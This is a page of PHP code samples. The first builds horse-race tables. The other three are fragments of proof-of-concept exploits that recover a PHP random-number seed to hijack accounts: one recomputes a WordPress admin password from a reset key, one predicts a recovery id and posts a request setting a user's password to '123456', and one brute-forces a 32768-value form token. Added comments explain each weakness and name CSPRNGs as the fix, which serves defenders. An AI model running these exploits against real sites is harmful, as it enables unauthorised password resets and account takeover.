Пример #1
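/**
 * Fill the global race tables: per-horse win counts, payout coefficients and names.
 *
 * Win counts are split out of $races_count so that every horse is left at least one
 * win. Coefficients are the inverse win share with roughly +/-10% jitter. Names come
 * from ut_gladiator_names, ordered by a seeded SQL rand().
 *
 * Only the name query is driven by $seed. Win counts use rand() after an argument-less
 * srand(), so they cannot be reproduced from the seed.
 *
 * NOTE(review): rand() is not a cryptographically secure generator. If race outcomes
 * carry value (bets, prizes), draw them from a CSPRNG so players cannot predict them.
 * NOTE(review): mysql_fetch_array() belongs to the ext/mysql API, which was removed in
 * PHP 7; runsql() is defined elsewhere, so the driver is left untouched here.
 *
 * @param mixed $seed Seed for the name ordering; a falsy value derives one via getseed().
 * @return void Results are written to $horses_wins, $horses_coefficients, $horses_names.
 */
function horses_generate($seed)
{
    global $horses_wins, $cnt, $horses_count, $races_count, $horses_coefficients, $horses_names;
    if (!$seed) {
        $seed = getseed(time() + 30 * 60 * $cnt);
    }
    // Both values are spliced into the SQL text, so force them to integers first:
    // a caller-supplied $seed must never be able to alter the statement.
    $sqlSeed = (int) $seed;
    $sqlLimit = (int) $horses_count;
    srand();
    $s = $races_count;
    $res1 = runsql("select Name from ut_gladiator_names where CountryID='1' order by rand({$sqlSeed}) limit 0,{$sqlLimit}");
    for ($i = 1; $i <= $horses_count; $i++) {
        // Upper bound leaves one win for each remaining horse. The original wrote the
        // bare constant `i` instead of `$i`, which broke that invariant. The clamp
        // keeps rand() from receiving max < min when races are scarcer than horses.
        $upper = max(1, $s + $i - $horses_count);
        if ($i == $horses_count) {
            // The last horse takes whatever is left.
            $horses_wins[$i] = $s;
        } elseif ($i == 1) {
            $horses_wins[$i] = round(rand(1, $upper) / 2);
        } else {
            $horses_wins[$i] = rand(1, $upper);
        }
        // Guard the division below (zero or negative leftovers become a single win).
        if ($horses_wins[$i] < 1) {
            $horses_wins[$i] = 1;
        }
        $s = $s - $horses_wins[$i];
        // rand() takes integers only: rand(-0.1, 0.1) truncated both bounds to 0 and
        // never added jitter. Draw in thousandths instead to get [-0.1, 0.1].
        $jitter = rand(-100, 100) / 1000;
        $horses_coefficients[$i] = round($races_count / $horses_wins[$i] * (0.9 + $jitter), 1);
        $r1 = mysql_fetch_array($res1);
        // Fewer rows than horses: record null rather than indexing into false.
        $horses_names[$i] = $r1 ? $r1[0] : null;
    }
}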
Пример #2
/**
 * Proof-of-concept routine that recomputes a password from a mailed reset key once the
 * mt_rand() seed behind that key is known.
 *
 * What it demonstrates for defenders: when a reset key and the password that follows it
 * are both drawn from the same mt_rand() stream, the key discloses enough generator
 * state to determine the password. The remedy is to generate keys and passwords from a
 * CSPRNG (random_bytes()/random_int()) and to never expose output of a seedable PRNG.
 *
 * Statement order matters throughout: every mt_srand()/mt_rand()/wp_generate_password()
 * call advances or resets the shared generator state.
 *
 * @param string $resetkey Reset key as received by mail (per the status message below).
 * @param mixed  $seed     Optional known seed; when falsy it is looked up via getseed(),
 *                         which is defined outside this block.
 * @return string The value returned by wp_generate_password() after reseeding.
 */
function calcpass($resetkey, $seed = false)
{
    // Probe the interpreter: seed with 2 and with 3 and compare the first outputs.
    // Equal outputs mean distinct seeds collapse to the same stream on this PHP build.
    mt_srand(2);
    $a = mt_rand();
    mt_srand(3);
    $b = mt_rand();
    // NOTE(review): define() runs on every call, so a second call would try to redefine BUGGY.
    define('BUGGY', $a == $b);
    echo "[-] wpress password computation. runnig in " . (BUGGY ? 'fast' : 'slow') . " mode\n";
    echo "[+] got key {$resetkey} via mail\n";
    if (!$seed) {
        // getseed() is not visible here; presumably it searches for the seed that yields this key.
        $seed = getseed($resetkey);
    }
    if ($seed === false) {
        // The message ties success to the PHP version: the generator must behave identically.
        die("[!] seed not found :( try using identical php version (< 5.2.5)\n");
    }
    mt_srand($seed);
    // The first draw reproduces the 20-character key (shown for comparison). The second draw
    // is taken as the password, presumably mirroring the order the target application used.
    echo "[-] seed for key " . wp_generate_password(20, false) . " is {$seed}\n";
    $pass = wp_generate_password();
    echo "[+] new credentials are admin:{$pass}\n";
    return $pass;
}
Пример #3
 // Fragment of a proof-of-concept against a password-recovery flow; it begins mid-request
 // ($data, $cmd, $fp, $host, $path, $uid and $hash are set above this excerpt) and the
 // final if-block continues past the excerpt's end.
 //
 // Defensive reading: a client-visible cookie value and the recovery id appear to come from
 // the same mt_rand() stream, so observing the former lets the latter be recomputed.
 // Recovery ids should be generated with a CSPRNG and be independent of anything the
 // client can see.
 $data .= "Referer: http://{$host}{$path}\r\n";
 $data .= "Host: {$host}\r\n";
 $data .= "Content-Length: " . strlen($cmd) . "\r\n";
 $data .= "Connection: close\r\n\r\n";
 $data .= $cmd;
 fputs($fp, $data);
 // Read the whole response; the request asked for "Connection: close", so EOF ends the loop.
 $resp = '';
 while ($fp && !feof($fp)) {
     $resp .= fread($fp, 1024);
 }
 fclose($fp);
 // Capture the 6-character alphanumeric value of the "<prefix>_sid" cookie from the headers.
 preg_match('/Set-Cookie:\\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
 if (!$sid) {
     exit("Exploit Failed!\n");
 }
 // getseed() is defined outside this excerpt; presumably it derives the seed from $sid.
 $seed = getseed();
 if ($seed) {
     // Replay the generator: reseed, then discard one random() and one mt_rand() draw before
     // taking the value used as the recovery id. random() is a helper not shown here.
     // Presumably this mirrors the draws the server made; the order must not change.
     mt_srand($seed);
     random();
     mt_rand();
     $id = random();
     $fp = fsockopen($host, 80);
     // Second request: submits the computed id to member.php's getpasswd action together
     // with a new password and the form hash captured earlier.
     $cmd = 'action=getpasswd&uid=' . $uid . '&id=' . $id . '&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash=' . $hash[1];
     $data = "POST " . $path . "member.php HTTP/1.1\r\n";
     $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
     $data .= "Referer: http://{$host}{$path}\r\n";
     $data .= "Host: {$host}\r\n";
     $data .= "Content-Length: " . strlen($cmd) . "\r\n";
     $data .= "Connection: close\r\n\r\n";
     $data .= $cmd;
     fputs($fp, $data);
Пример #4
// Excerpt of a proof-of-concept: requests the password-reminder form and reads back the
// hidden "sc" field. $ock, $host, $path and $sess are set above this excerpt.
//
// Defensive reading: getseed() below tests md5($sess . $i) for $i in 0..32767, so the only
// unknown in the "sc" value is a number from a 32768-element space, since the session id
// is already known to the client. Such a token can be enumerated offline. Form tokens
// should come from a CSPRNG or be an HMAC keyed with a server-side secret.
$packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sess};\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n\r\n";
fputs($ock, $packet);
// Scan the response line by line and stop at the first hex value in a name="sc" field.
// NOTE(review): $md5 is only assigned on a match; whether it is initialised earlier is not visible here.
while (!feof($ock)) {
    $resp = fgets($ock);
    preg_match('@name="sc" value="([0-9a-f]+)"@i', $resp, $out);
    if (isset($out[1])) {
        $md5 = $out[1];
        break;
    }
}
if ($md5) {
    // A hit of 0 is falsy, so it is reported the same way as "no seed found".
    $seed = getseed($md5);
    if ($seed) {
        echo "[+] Seed for next random number is {$seed}\n";
    } else {
        die("[-] Can't calculate seed\n");
    }
} else {
    die("[-] Random number hash not found\n");
}
function getseed($md5)
{
    global $sess;
    for ($i = 0; $i <= 32767; $i++) {
        if ($md5 == md5($sess . $i)) {
            return $i;
        }